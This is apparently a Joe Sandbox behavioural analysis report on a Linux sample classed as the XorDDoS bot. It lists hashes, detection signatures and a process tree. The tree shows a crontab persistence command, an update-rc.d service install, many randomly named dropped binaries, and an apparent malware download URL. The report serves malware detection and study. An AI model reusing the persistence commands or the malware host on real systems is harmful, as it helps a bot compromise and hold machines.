Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
dkuidbsedp

Overview

General Information

Sample Name:dkuidbsedp
Analysis ID:674155
MD5:37542894283b8851469753de69c0bcdc
SHA1:0480f29f346b400b989d88798b4418d5ef0fd3d9
SHA256:7c0d5161ad70acf5b98b640089d23ada44935dcd7240c64d43f7cc54d853acb1
Infos:

Detection

XorDDoS
Score:100
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Antivirus detection for dropped file
Yara detected XorDDoS Bot
Snort IDS alert for network traffic
Sample tries to persist itself using System V runlevels
Machine Learning detection for dropped file
Sample tries to persist itself using cron
Drops files in suspicious directories
Sample deletes itself
Machine Learning detection for sample
Writes ELF files to disk
Yara signature match
Drops files with innocent-looking names
PID-file does not contain an ASCII number
Writes shell script files to disk
Reads system information from the proc file system
Uses the "uname" system call to query kernel version information (possible evasion)
Executes the "systemctl" command used for controlling the systemd system and service manager
Detected non-DNS traffic on DNS port
Sample and/or dropped files contains symbols with suspicious names
Reads CPU information from /proc indicative of miner or evasive malware
Writes shell script file to disk with an unusual file extension

Classification

Joe Sandbox Version:35.0.0 Citrine
Analysis ID:674155
Start date and time: 27/07/202209:47:302022-07-27 09:47:30 +02:00
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 7m 52s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:dkuidbsedp
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 16.04 x64 (Kernel 4.4.0-116, Firefox 88.0, Document Viewer 3.18.2, LibreOffice 5.1.6.2, OpenJDK 1.8.0_171)
Analysis Mode:default
Detection:MAL
Classification:mal100.troj.evad.lin@0/20@5/0
  • VT rate limit hit for: http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9rl
Command:/tmp/dkuidbsedp
PID:9445
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:

Standard Error:
  • system is lnxubuntu1
  • dkuidbsedp (PID: 9445, Parent: 9377, MD5: 37542894283b8851469753de69c0bcdc) Arguments: /tmp/dkuidbsedp
    • dkuidbsedp New Fork (PID: 9446, Parent: 9445)
      • dkuidbsedp New Fork (PID: 9457, Parent: 9446)
        • update-rc.d (PID: 9458, Parent: 9457, MD5: e9e125904f9ed8ff4c8504a55a149005) Arguments: /usr/bin/perl /usr/sbin/update-rc.d dkuidbsedp defaults
          • insserv (PID: 9493, Parent: 9458, MD5: 34c11674a0b29347001640aeae7c94f1) Arguments: /usr/lib/insserv/insserv dkuidbsedp
          • systemctl (PID: 9537, Parent: 9458, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl daemon-reload
      • dash (PID: 9469, Parent: 9446, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "sed -i '/\\/etc\\/cron.hourly\\/gcc.sh/d' /etc/crontab && echo '*/3 * * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab"
        • dash New Fork (PID: 9472, Parent: 9469)
        • sed (PID: 9472, Parent: 9469, MD5: c1a00c583ba08e728b10f3f46f5776d6) Arguments: sed -i /\\/etc\\/cron.hourly\\/gcc.sh/d /etc/crontab
      • dkuidbsedp New Fork (PID: 9546, Parent: 9446)
        • qvilroogsz (PID: 9547, Parent: 9546, MD5: ada71b4b71b57b78680a7d8efd5c3382) Arguments: /usr/bin/qvilroogsz "ls -la" 9446
      • dkuidbsedp New Fork (PID: 9557, Parent: 9446)
        • qvilroogsz (PID: 9558, Parent: 9557, MD5: ada71b4b71b57b78680a7d8efd5c3382) Arguments: /usr/bin/qvilroogsz "cat resolv.conf" 9446
      • dkuidbsedp New Fork (PID: 9568, Parent: 9446)
        • qvilroogsz (PID: 9569, Parent: 9568, MD5: ada71b4b71b57b78680a7d8efd5c3382) Arguments: /usr/bin/qvilroogsz "grep \"A\"" 9446
      • dkuidbsedp New Fork (PID: 9579, Parent: 9446)
        • qvilroogsz (PID: 9580, Parent: 9579, MD5: ada71b4b71b57b78680a7d8efd5c3382) Arguments: /usr/bin/qvilroogsz "netstat -antop" 9446
      • dkuidbsedp New Fork (PID: 9590, Parent: 9446)
        • qvilroogsz (PID: 9591, Parent: 9590, MD5: ada71b4b71b57b78680a7d8efd5c3382) Arguments: /usr/bin/qvilroogsz "netstat -antop" 9446
      • dkuidbsedp New Fork (PID: 9601, Parent: 9446)
        • wyyhrifhaz (PID: 9602, Parent: 9601, MD5: 54dae078a67e6b3e3da231442bf638ad) Arguments: /usr/bin/wyyhrifhaz bash 9446
      • dkuidbsedp New Fork (PID: 9612, Parent: 9446)
        • wyyhrifhaz (PID: 9613, Parent: 9612, MD5: 54dae078a67e6b3e3da231442bf638ad) Arguments: /usr/bin/wyyhrifhaz "cd /etc" 9446
      • dkuidbsedp New Fork (PID: 9623, Parent: 9446)
        • wyyhrifhaz (PID: 9624, Parent: 9623, MD5: 54dae078a67e6b3e3da231442bf638ad) Arguments: /usr/bin/wyyhrifhaz whoami 9446
      • dkuidbsedp New Fork (PID: 9634, Parent: 9446)
        • wyyhrifhaz (PID: 9635, Parent: 9634, MD5: 54dae078a67e6b3e3da231442bf638ad) Arguments: /usr/bin/wyyhrifhaz id 9446
      • dkuidbsedp New Fork (PID: 9644, Parent: 9446)
        • wyyhrifhaz (PID: 9646, Parent: 9644, MD5: 54dae078a67e6b3e3da231442bf638ad) Arguments: /usr/bin/wyyhrifhaz "netstat -an" 9446
      • dkuidbsedp New Fork (PID: 9656, Parent: 9446)
        • wrfeamwlub (PID: 9657, Parent: 9656, MD5: 2cc8aeffc8af7addf44cb78168298206) Arguments: /usr/bin/wrfeamwlub id 9446
      • dkuidbsedp New Fork (PID: 9667, Parent: 9446)
        • wrfeamwlub (PID: 9668, Parent: 9667, MD5: 2cc8aeffc8af7addf44cb78168298206) Arguments: /usr/bin/wrfeamwlub ls 9446
      • dkuidbsedp New Fork (PID: 9678, Parent: 9446)
        • wrfeamwlub (PID: 9679, Parent: 9678, MD5: 2cc8aeffc8af7addf44cb78168298206) Arguments: /usr/bin/wrfeamwlub "echo \"find\"" 9446
      • dkuidbsedp New Fork (PID: 9689, Parent: 9446)
        • wrfeamwlub (PID: 9690, Parent: 9689, MD5: 2cc8aeffc8af7addf44cb78168298206) Arguments: /usr/bin/wrfeamwlub "ifconfig eth0" 9446
      • dkuidbsedp New Fork (PID: 9700, Parent: 9446)
        • wrfeamwlub (PID: 9701, Parent: 9700, MD5: 2cc8aeffc8af7addf44cb78168298206) Arguments: /usr/bin/wrfeamwlub id 9446
      • dkuidbsedp New Fork (PID: 9711, Parent: 9446)
        • wgpgdetjwe (PID: 9712, Parent: 9711, MD5: a23fddceeec8b0b1803afa96b34f57de) Arguments: /usr/bin/wgpgdetjwe "ps -ef" 9446
      • dkuidbsedp New Fork (PID: 9722, Parent: 9446)
        • wgpgdetjwe (PID: 9723, Parent: 9722, MD5: a23fddceeec8b0b1803afa96b34f57de) Arguments: /usr/bin/wgpgdetjwe whoami 9446
      • dkuidbsedp New Fork (PID: 9733, Parent: 9446)
        • wgpgdetjwe (PID: 9734, Parent: 9733, MD5: a23fddceeec8b0b1803afa96b34f57de) Arguments: /usr/bin/wgpgdetjwe "ifconfig eth0" 9446
      • dkuidbsedp New Fork (PID: 9744, Parent: 9446)
        • wgpgdetjwe (PID: 9745, Parent: 9744, MD5: a23fddceeec8b0b1803afa96b34f57de) Arguments: /usr/bin/wgpgdetjwe "grep \"A\"" 9446
      • dkuidbsedp New Fork (PID: 9755, Parent: 9446)
        • wgpgdetjwe (PID: 9756, Parent: 9755, MD5: a23fddceeec8b0b1803afa96b34f57de) Arguments: /usr/bin/wgpgdetjwe "route -n" 9446
      • dkuidbsedp New Fork (PID: 9766, Parent: 9446)
        • zyapsjpaje (PID: 9767, Parent: 9766, MD5: e6a731eab67241eef92d9748fd128432) Arguments: /usr/bin/zyapsjpaje su 9446
      • dkuidbsedp New Fork (PID: 9777, Parent: 9446)
        • zyapsjpaje (PID: 9778, Parent: 9777, MD5: e6a731eab67241eef92d9748fd128432) Arguments: /usr/bin/zyapsjpaje "ps -ef" 9446
      • dkuidbsedp New Fork (PID: 9788, Parent: 9446)
        • zyapsjpaje (PID: 9789, Parent: 9788, MD5: e6a731eab67241eef92d9748fd128432) Arguments: /usr/bin/zyapsjpaje bash 9446
      • dkuidbsedp New Fork (PID: 9799, Parent: 9446)
        • zyapsjpaje (PID: 9800, Parent: 9799, MD5: e6a731eab67241eef92d9748fd128432) Arguments: /usr/bin/zyapsjpaje ls 9446
      • dkuidbsedp New Fork (PID: 9810, Parent: 9446)
        • zyapsjpaje (PID: 9811, Parent: 9810, MD5: e6a731eab67241eef92d9748fd128432) Arguments: /usr/bin/zyapsjpaje "echo \"find\"" 9446
      • dkuidbsedp New Fork (PID: 9821, Parent: 9446)
        • yfiimchuiz (PID: 9822, Parent: 9821, MD5: 799bae277cbb415227a0100b46398b8f) Arguments: /usr/bin/yfiimchuiz id 9446
      • dkuidbsedp New Fork (PID: 9832, Parent: 9446)
        • yfiimchuiz (PID: 9833, Parent: 9832, MD5: 799bae277cbb415227a0100b46398b8f) Arguments: /usr/bin/yfiimchuiz pwd 9446
      • dkuidbsedp New Fork (PID: 9843, Parent: 9446)
        • yfiimchuiz (PID: 9844, Parent: 9843, MD5: 799bae277cbb415227a0100b46398b8f) Arguments: /usr/bin/yfiimchuiz pwd 9446
      • dkuidbsedp New Fork (PID: 9854, Parent: 9446)
        • yfiimchuiz (PID: 9855, Parent: 9854, MD5: 799bae277cbb415227a0100b46398b8f) Arguments: /usr/bin/yfiimchuiz id 9446
      • dkuidbsedp New Fork (PID: 9865, Parent: 9446)
        • yfiimchuiz (PID: 9866, Parent: 9865, MD5: 799bae277cbb415227a0100b46398b8f) Arguments: /usr/bin/yfiimchuiz gnome-terminal 9446
      • dkuidbsedp New Fork (PID: 9876, Parent: 9446)
        • txflbjqefg (PID: 9877, Parent: 9876, MD5: 75e59fa1a4720187f898957348fda126) Arguments: /usr/bin/txflbjqefg "sleep 1" 9446
      • dkuidbsedp New Fork (PID: 9887, Parent: 9446)
        • txflbjqefg (PID: 9888, Parent: 9887, MD5: 75e59fa1a4720187f898957348fda126) Arguments: /usr/bin/txflbjqefg top 9446
      • dkuidbsedp New Fork (PID: 9898, Parent: 9446)
        • txflbjqefg (PID: 9899, Parent: 9898, MD5: 75e59fa1a4720187f898957348fda126) Arguments: /usr/bin/txflbjqefg gnome-terminal 9446
      • dkuidbsedp New Fork (PID: 9909, Parent: 9446)
        • txflbjqefg (PID: 9910, Parent: 9909, MD5: 75e59fa1a4720187f898957348fda126) Arguments: /usr/bin/txflbjqefg "ls -la" 9446
      • dkuidbsedp New Fork (PID: 9920, Parent: 9446)
        • txflbjqefg (PID: 9921, Parent: 9920, MD5: 75e59fa1a4720187f898957348fda126) Arguments: /usr/bin/txflbjqefg "ps -ef" 9446
      • dkuidbsedp New Fork (PID: 9931, Parent: 9446)
        • qjfxtxsijs (PID: 9932, Parent: 9931, MD5: 446f97ee9842b394ed1a50fe59b5c7d8) Arguments: /usr/bin/qjfxtxsijs ifconfig 9446
      • dkuidbsedp New Fork (PID: 9942, Parent: 9446)
        • qjfxtxsijs (PID: 9943, Parent: 9942, MD5: 446f97ee9842b394ed1a50fe59b5c7d8) Arguments: /usr/bin/qjfxtxsijs "route -n" 9446
      • dkuidbsedp New Fork (PID: 9953, Parent: 9446)
        • qjfxtxsijs (PID: 9954, Parent: 9953, MD5: 446f97ee9842b394ed1a50fe59b5c7d8) Arguments: /usr/bin/qjfxtxsijs pwd 9446
      • dkuidbsedp New Fork (PID: 9964, Parent: 9446)
        • qjfxtxsijs (PID: 9965, Parent: 9964, MD5: 446f97ee9842b394ed1a50fe59b5c7d8) Arguments: /usr/bin/qjfxtxsijs id 9446
      • dkuidbsedp New Fork (PID: 9975, Parent: 9446)
        • qjfxtxsijs (PID: 9976, Parent: 9975, MD5: 446f97ee9842b394ed1a50fe59b5c7d8) Arguments: /usr/bin/qjfxtxsijs "cat resolv.conf" 9446
      • dkuidbsedp New Fork (PID: 9988, Parent: 9446)
        • tudlcvpgbc (PID: 9989, Parent: 9988, MD5: e9f6680f4483fb8bc5fb7e9e55222bd7) Arguments: /usr/bin/tudlcvpgbc "netstat -an" 9446
      • dkuidbsedp New Fork (PID: 9999, Parent: 9446)
        • tudlcvpgbc (PID: 10000, Parent: 9999, MD5: e9f6680f4483fb8bc5fb7e9e55222bd7) Arguments: /usr/bin/tudlcvpgbc id 9446
      • dkuidbsedp New Fork (PID: 10010, Parent: 9446)
        • tudlcvpgbc (PID: 10011, Parent: 10010, MD5: e9f6680f4483fb8bc5fb7e9e55222bd7) Arguments: /usr/bin/tudlcvpgbc "sleep 1" 9446
      • dkuidbsedp New Fork (PID: 10021, Parent: 9446)
        • tudlcvpgbc (PID: 10022, Parent: 10021, MD5: e9f6680f4483fb8bc5fb7e9e55222bd7) Arguments: /usr/bin/tudlcvpgbc "route -n" 9446
      • dkuidbsedp New Fork (PID: 10032, Parent: 9446)
        • tudlcvpgbc (PID: 10033, Parent: 10032, MD5: e9f6680f4483fb8bc5fb7e9e55222bd7) Arguments: /usr/bin/tudlcvpgbc "ls -la" 9446
      • dkuidbsedp New Fork (PID: 10043, Parent: 9446)
        • whtzopaggc (PID: 10044, Parent: 10043, MD5: 3fa295ff1f014fb5dd96c4434909ec39) Arguments: /usr/bin/whtzopaggc "echo \"find\"" 9446
      • dkuidbsedp New Fork (PID: 10054, Parent: 9446)
        • whtzopaggc (PID: 10055, Parent: 10054, MD5: 3fa295ff1f014fb5dd96c4434909ec39) Arguments: /usr/bin/whtzopaggc "grep \"A\"" 9446
      • dkuidbsedp New Fork (PID: 10065, Parent: 9446)
        • whtzopaggc (PID: 10066, Parent: 10065, MD5: 3fa295ff1f014fb5dd96c4434909ec39) Arguments: /usr/bin/whtzopaggc bash 9446
      • dkuidbsedp New Fork (PID: 10076, Parent: 9446)
        • whtzopaggc (PID: 10077, Parent: 10076, MD5: 3fa295ff1f014fb5dd96c4434909ec39) Arguments: /usr/bin/whtzopaggc gnome-terminal 9446
      • dkuidbsedp New Fork (PID: 10087, Parent: 9446)
        • whtzopaggc (PID: 10088, Parent: 10087, MD5: 3fa295ff1f014fb5dd96c4434909ec39) Arguments: /usr/bin/whtzopaggc "netstat -an" 9446
      • dkuidbsedp New Fork (PID: 10098, Parent: 9446)
        • kmavqzvhro (PID: 10099, Parent: 10098, MD5: a39f4dbba50225792bc678e0ae044ef5) Arguments: /usr/bin/kmavqzvhro bash 9446
      • dkuidbsedp New Fork (PID: 10109, Parent: 9446)
        • kmavqzvhro (PID: 10110, Parent: 10109, MD5: a39f4dbba50225792bc678e0ae044ef5) Arguments: /usr/bin/kmavqzvhro ifconfig 9446
      • dkuidbsedp New Fork (PID: 10120, Parent: 9446)
        • kmavqzvhro (PID: 10121, Parent: 10120, MD5: a39f4dbba50225792bc678e0ae044ef5) Arguments: /usr/bin/kmavqzvhro "ps -ef" 9446
      • dkuidbsedp New Fork (PID: 10131, Parent: 9446)
        • kmavqzvhro (PID: 10132, Parent: 10131, MD5: a39f4dbba50225792bc678e0ae044ef5) Arguments: /usr/bin/kmavqzvhro "route -n" 9446
      • dkuidbsedp New Fork (PID: 10142, Parent: 9446)
        • kmavqzvhro (PID: 10143, Parent: 10142, MD5: a39f4dbba50225792bc678e0ae044ef5) Arguments: /usr/bin/kmavqzvhro whoami 9446
      • dkuidbsedp New Fork (PID: 10153, Parent: 9446)
        • zetazkptwu (PID: 10154, Parent: 10153, MD5: 293bbabe5dde95c14afaf88a1fbbcb66) Arguments: /usr/bin/zetazkptwu "ps -ef" 9446
      • dkuidbsedp New Fork (PID: 10164, Parent: 9446)
        • zetazkptwu (PID: 10165, Parent: 10164, MD5: 293bbabe5dde95c14afaf88a1fbbcb66) Arguments: /usr/bin/zetazkptwu gnome-terminal 9446
      • dkuidbsedp New Fork (PID: 10175, Parent: 9446)
        • zetazkptwu (PID: 10176, Parent: 10175, MD5: 293bbabe5dde95c14afaf88a1fbbcb66) Arguments: /usr/bin/zetazkptwu "ifconfig eth0" 9446
      • dkuidbsedp New Fork (PID: 10186, Parent: 9446)
        • zetazkptwu (PID: 10187, Parent: 10186, MD5: 293bbabe5dde95c14afaf88a1fbbcb66) Arguments: /usr/bin/zetazkptwu who 9446
      • dkuidbsedp New Fork (PID: 10197, Parent: 9446)
        • zetazkptwu (PID: 10198, Parent: 10197, MD5: 293bbabe5dde95c14afaf88a1fbbcb66) Arguments: /usr/bin/zetazkptwu "ls -la" 9446
      • dkuidbsedp New Fork (PID: 10208, Parent: 9446)
        • jvzzirmjsa (PID: 10209, Parent: 10208, MD5: 0ba3c89d8717188f9c145cab884813ba) Arguments: /usr/bin/jvzzirmjsa su 9446
      • dkuidbsedp New Fork (PID: 10219, Parent: 9446)
        • jvzzirmjsa (PID: 10220, Parent: 10219, MD5: 0ba3c89d8717188f9c145cab884813ba) Arguments: /usr/bin/jvzzirmjsa bash 9446
      • dkuidbsedp New Fork (PID: 10230, Parent: 9446)
        • jvzzirmjsa (PID: 10231, Parent: 10230, MD5: 0ba3c89d8717188f9c145cab884813ba) Arguments: /usr/bin/jvzzirmjsa "cat resolv.conf" 9446
      • dkuidbsedp New Fork (PID: 10241, Parent: 9446)
        • jvzzirmjsa (PID: 10242, Parent: 10241, MD5: 0ba3c89d8717188f9c145cab884813ba) Arguments: /usr/bin/jvzzirmjsa "grep \"A\"" 9446
      • dkuidbsedp New Fork (PID: 10252, Parent: 9446)
        • jvzzirmjsa (PID: 10253, Parent: 10252, MD5: 0ba3c89d8717188f9c145cab884813ba) Arguments: /usr/bin/jvzzirmjsa "echo \"find\"" 9446
      • dkuidbsedp New Fork (PID: 10263, Parent: 9446)
        • gkckltchoc (PID: 10264, Parent: 10263, MD5: ff61e50427f02a493dd897777ec8a42f) Arguments: /usr/bin/gkckltchoc pwd 9446
      • dkuidbsedp New Fork (PID: 10274, Parent: 9446)
        • gkckltchoc (PID: 10275, Parent: 10274, MD5: ff61e50427f02a493dd897777ec8a42f) Arguments: /usr/bin/gkckltchoc id 9446
      • dkuidbsedp New Fork (PID: 10285, Parent: 9446)
        • gkckltchoc (PID: 10286, Parent: 10285, MD5: ff61e50427f02a493dd897777ec8a42f) Arguments: /usr/bin/gkckltchoc "ls -la" 9446
      • dkuidbsedp New Fork (PID: 10296, Parent: 9446)
        • gkckltchoc (PID: 10297, Parent: 10296, MD5: ff61e50427f02a493dd897777ec8a42f) Arguments: /usr/bin/gkckltchoc ifconfig 9446
      • dkuidbsedp New Fork (PID: 10307, Parent: 9446)
        • gkckltchoc (PID: 10308, Parent: 10307, MD5: ff61e50427f02a493dd897777ec8a42f) Arguments: /usr/bin/gkckltchoc "netstat -an" 9446
      • dkuidbsedp New Fork (PID: 10318, Parent: 9446)
        • rlxosagpct (PID: 10319, Parent: 10318, MD5: b51f6012587970272ce94c23f6c52f3a) Arguments: /usr/bin/rlxosagpct ifconfig 9446
      • dkuidbsedp New Fork (PID: 10329, Parent: 9446)
        • rlxosagpct (PID: 10330, Parent: 10329, MD5: b51f6012587970272ce94c23f6c52f3a) Arguments: /usr/bin/rlxosagpct pwd 9446
      • dkuidbsedp New Fork (PID: 10340, Parent: 9446)
        • rlxosagpct (PID: 10341, Parent: 10340, MD5: b51f6012587970272ce94c23f6c52f3a) Arguments: /usr/bin/rlxosagpct id 9446
      • dkuidbsedp New Fork (PID: 10351, Parent: 9446)
        • rlxosagpct (PID: 10352, Parent: 10351, MD5: b51f6012587970272ce94c23f6c52f3a) Arguments: /usr/bin/rlxosagpct pwd 9446
      • dkuidbsedp New Fork (PID: 10362, Parent: 9446)
        • rlxosagpct (PID: 10363, Parent: 10362, MD5: b51f6012587970272ce94c23f6c52f3a) Arguments: /usr/bin/rlxosagpct whoami 9446
      • dkuidbsedp New Fork (PID: 10373, Parent: 9446)
        • pnljtnsppb (PID: 10374, Parent: 10373, MD5: 40692a3a476d75da8623f32327526dd6) Arguments: /usr/bin/pnljtnsppb "netstat -antop" 9446
      • dkuidbsedp New Fork (PID: 10384, Parent: 9446)
        • pnljtnsppb (PID: 10385, Parent: 10384, MD5: 40692a3a476d75da8623f32327526dd6) Arguments: /usr/bin/pnljtnsppb who 9446
      • dkuidbsedp New Fork (PID: 10395, Parent: 9446)
        • pnljtnsppb (PID: 10396, Parent: 10395, MD5: 40692a3a476d75da8623f32327526dd6) Arguments: /usr/bin/pnljtnsppb "ifconfig eth0" 9446
      • dkuidbsedp New Fork (PID: 10406, Parent: 9446)
        • pnljtnsppb (PID: 10407, Parent: 10406, MD5: 40692a3a476d75da8623f32327526dd6) Arguments: /usr/bin/pnljtnsppb "grep \"A\"" 9446
      • dkuidbsedp New Fork (PID: 10417, Parent: 9446)
        • pnljtnsppb (PID: 10418, Parent: 10417, MD5: 40692a3a476d75da8623f32327526dd6) Arguments: /usr/bin/pnljtnsppb "netstat -antop" 9446
      • dkuidbsedp New Fork (PID: 10428, Parent: 9446)
        • lhyaaotaph (PID: 10429, Parent: 10428, MD5: 8b0c232594f545d682d180475cf5aa04) Arguments: /usr/bin/lhyaaotaph "route -n" 9446
      • dkuidbsedp New Fork (PID: 10439, Parent: 9446)
        • lhyaaotaph (PID: 10440, Parent: 10439, MD5: 8b0c232594f545d682d180475cf5aa04) Arguments: /usr/bin/lhyaaotaph id 9446
      • dkuidbsedp New Fork (PID: 10450, Parent: 9446)
        • lhyaaotaph (PID: 10451, Parent: 10450, MD5: 8b0c232594f545d682d180475cf5aa04) Arguments: /usr/bin/lhyaaotaph whoami 9446
      • dkuidbsedp New Fork (PID: 10459, Parent: 9446)
        • lhyaaotaph (PID: 10461, Parent: 3310, MD5: 8b0c232594f545d682d180475cf5aa04) Arguments: /usr/bin/lhyaaotaph ifconfig 9446
      • dkuidbsedp New Fork (PID: 10462, Parent: 9446)
        • lhyaaotaph (PID: 10464, Parent: 10462, MD5: 8b0c232594f545d682d180475cf5aa04) Arguments: /usr/bin/lhyaaotaph "grep \"A\"" 9446
      • dkuidbsedp New Fork (PID: 10483, Parent: 9446)
        • otigswehlv (PID: 10484, Parent: 3310, MD5: 2228daad34272962a9c0b67789ea5e77) Arguments: /usr/bin/otigswehlv "sleep 1" 9446
      • dkuidbsedp New Fork (PID: 10485, Parent: 9446)
        • otigswehlv (PID: 10486, Parent: 3310, MD5: 2228daad34272962a9c0b67789ea5e77) Arguments: /usr/bin/otigswehlv "route -n" 9446
      • dkuidbsedp New Fork (PID: 10487, Parent: 9446)
        • otigswehlv (PID: 10489, Parent: 3310, MD5: 2228daad34272962a9c0b67789ea5e77) Arguments: /usr/bin/otigswehlv sh 9446
      • dkuidbsedp New Fork (PID: 10491, Parent: 9446)
        • otigswehlv (PID: 10493, Parent: 3310, MD5: 2228daad34272962a9c0b67789ea5e77) Arguments: /usr/bin/otigswehlv "cat resolv.conf" 9446
      • dkuidbsedp New Fork (PID: 10497, Parent: 9446)
        • otigswehlv (PID: 10499, Parent: 10497, MD5: 2228daad34272962a9c0b67789ea5e77) Arguments: /usr/bin/otigswehlv "netstat -antop" 9446
      • dkuidbsedp New Fork (PID: 10538, Parent: 9446)
        • thzryslebl (PID: 10539, Parent: 3310, MD5: e3cb568f026ace3642e8e03b7d58acfa) Arguments: /usr/bin/thzryslebl gnome-terminal 9446
      • dkuidbsedp New Fork (PID: 10540, Parent: 9446)
        • thzryslebl (PID: 10542, Parent: 10540, MD5: e3cb568f026ace3642e8e03b7d58acfa) Arguments: /usr/bin/thzryslebl "cat resolv.conf" 9446
      • dkuidbsedp New Fork (PID: 10544, Parent: 9446)
        • thzryslebl (PID: 10547, Parent: 3310, MD5: e3cb568f026ace3642e8e03b7d58acfa) Arguments: /usr/bin/thzryslebl sh 9446
      • dkuidbsedp New Fork (PID: 10549, Parent: 9446)
        • thzryslebl (PID: 10553, Parent: 3310, MD5: e3cb568f026ace3642e8e03b7d58acfa) Arguments: /usr/bin/thzryslebl id 9446
      • dkuidbsedp New Fork (PID: 10556, Parent: 9446)
        • thzryslebl (PID: 10561, Parent: 10556, MD5: e3cb568f026ace3642e8e03b7d58acfa) Arguments: /usr/bin/thzryslebl "echo \"find\"" 9446
      • dkuidbsedp New Fork (PID: 10595, Parent: 9446)
        • sunvkgnszw (PID: 10596, Parent: 3310, MD5: 3c729bbc723a5ec2053509a8a7b8f520) Arguments: /usr/bin/sunvkgnszw "ifconfig eth0" 9446
      • dkuidbsedp New Fork (PID: 10597, Parent: 9446)
        • sunvkgnszw (PID: 10599, Parent: 3310, MD5: 3c729bbc723a5ec2053509a8a7b8f520) Arguments: /usr/bin/sunvkgnszw "cd /etc" 9446
      • dkuidbsedp New Fork (PID: 10600, Parent: 9446)
        • sunvkgnszw (PID: 10604, Parent: 3310, MD5: 3c729bbc723a5ec2053509a8a7b8f520) Arguments: /usr/bin/sunvkgnszw uptime 9446
      • dkuidbsedp New Fork (PID: 10606, Parent: 9446)
        • sunvkgnszw (PID: 10608, Parent: 3310, MD5: 3c729bbc723a5ec2053509a8a7b8f520) Arguments: /usr/bin/sunvkgnszw "ls -la" 9446
      • dkuidbsedp New Fork (PID: 10611, Parent: 9446)
        • sunvkgnszw (PID: 10614, Parent: 3310, MD5: 3c729bbc723a5ec2053509a8a7b8f520) Arguments: /usr/bin/sunvkgnszw id 9446
      • dkuidbsedp New Fork (PID: 10650, Parent: 9446)
        • yclsxhkbli (PID: 10651, Parent: 3310, MD5: 595277e5113341b08e8774d7eff08b83) Arguments: /usr/bin/yclsxhkbli pwd 9446
      • dkuidbsedp New Fork (PID: 10652, Parent: 9446)
        • yclsxhkbli (PID: 10654, Parent: 3310, MD5: 595277e5113341b08e8774d7eff08b83) Arguments: /usr/bin/yclsxhkbli "route -n" 9446
      • dkuidbsedp New Fork (PID: 10655, Parent: 9446)
        • yclsxhkbli (PID: 10659, Parent: 3310, MD5: 595277e5113341b08e8774d7eff08b83) Arguments: /usr/bin/yclsxhkbli "route -n" 9446
      • dkuidbsedp New Fork (PID: 10661, Parent: 9446)
        • yclsxhkbli (PID: 10665, Parent: 3310, MD5: 595277e5113341b08e8774d7eff08b83) Arguments: /usr/bin/yclsxhkbli uptime 9446
      • dkuidbsedp New Fork (PID: 10668, Parent: 9446)
        • yclsxhkbli (PID: 10672, Parent: 3310, MD5: 595277e5113341b08e8774d7eff08b83) Arguments: /usr/bin/yclsxhkbli "cat resolv.conf" 9446
      • dkuidbsedp New Fork (PID: 10705, Parent: 9446)
        • nvlkgshfzs (PID: 10706, Parent: 3310, MD5: 5a99f637c7edead59c4587f692d6b428) Arguments: /usr/bin/nvlkgshfzs uptime 9446
      • dkuidbsedp New Fork (PID: 10707, Parent: 9446)
        • nvlkgshfzs (PID: 10708, Parent: 3310, MD5: 5a99f637c7edead59c4587f692d6b428) Arguments: /usr/bin/nvlkgshfzs su 9446
      • dkuidbsedp New Fork (PID: 10709, Parent: 9446)
        • nvlkgshfzs (PID: 10711, Parent: 3310, MD5: 5a99f637c7edead59c4587f692d6b428) Arguments: /usr/bin/nvlkgshfzs "netstat -an" 9446
      • dkuidbsedp New Fork (PID: 10712, Parent: 9446)
        • nvlkgshfzs (PID: 10714, Parent: 3310, MD5: 5a99f637c7edead59c4587f692d6b428) Arguments: /usr/bin/nvlkgshfzs "echo \"find\"" 9446
      • dkuidbsedp New Fork (PID: 10715, Parent: 9446)
        • nvlkgshfzs (PID: 10718, Parent: 3310, MD5: 5a99f637c7edead59c4587f692d6b428) Arguments: /usr/bin/nvlkgshfzs "ifconfig eth0" 9446
      • dkuidbsedp New Fork (PID: 10760, Parent: 9446)
        • wgerzwaeqg (PID: 10761, Parent: 3310, MD5: 26f4791e4abad1456b3c4b154d2d2918) Arguments: /usr/bin/wgerzwaeqg whoami 9446
      • dkuidbsedp New Fork (PID: 10762, Parent: 9446)
        • wgerzwaeqg (PID: 10764, Parent: 10762, MD5: 26f4791e4abad1456b3c4b154d2d2918) Arguments: /usr/bin/wgerzwaeqg "route -n" 9446
      • dkuidbsedp New Fork (PID: 10766, Parent: 9446)
        • wgerzwaeqg (PID: 10767, Parent: 3310, MD5: 26f4791e4abad1456b3c4b154d2d2918) Arguments: /usr/bin/wgerzwaeqg ls 9446
      • dkuidbsedp New Fork (PID: 10769, Parent: 9446)
        • wgerzwaeqg (PID: 10772, Parent: 3310, MD5: 26f4791e4abad1456b3c4b154d2d2918) Arguments: /usr/bin/wgerzwaeqg uptime 9446
      • dkuidbsedp New Fork (PID: 10775, Parent: 9446)
        • wgerzwaeqg (PID: 10777, Parent: 10775, MD5: 26f4791e4abad1456b3c4b154d2d2918) Arguments: /usr/bin/wgerzwaeqg "sleep 1" 9446
      • dkuidbsedp New Fork (PID: 10815, Parent: 9446)
        • chvtxqzhiw (PID: 10816, Parent: 3310, MD5: 95a3baa8a504f487595262f5f028bf8e) Arguments: /usr/bin/chvtxqzhiw "cat resolv.conf" 9446
      • dkuidbsedp New Fork (PID: 10817, Parent: 9446)
        • chvtxqzhiw (PID: 10819, Parent: 10817, MD5: 95a3baa8a504f487595262f5f028bf8e) Arguments: /usr/bin/chvtxqzhiw gnome-terminal 9446
      • dkuidbsedp New Fork (PID: 10821, Parent: 9446)
        • chvtxqzhiw (PID: 10824, Parent: 3310, MD5: 95a3baa8a504f487595262f5f028bf8e) Arguments: /usr/bin/chvtxqzhiw ifconfig 9446
      • dkuidbsedp New Fork (PID: 10826, Parent: 9446)
        • chvtxqzhiw (PID: 10829, Parent: 3310, MD5: 95a3baa8a504f487595262f5f028bf8e) Arguments: /usr/bin/chvtxqzhiw bash 9446
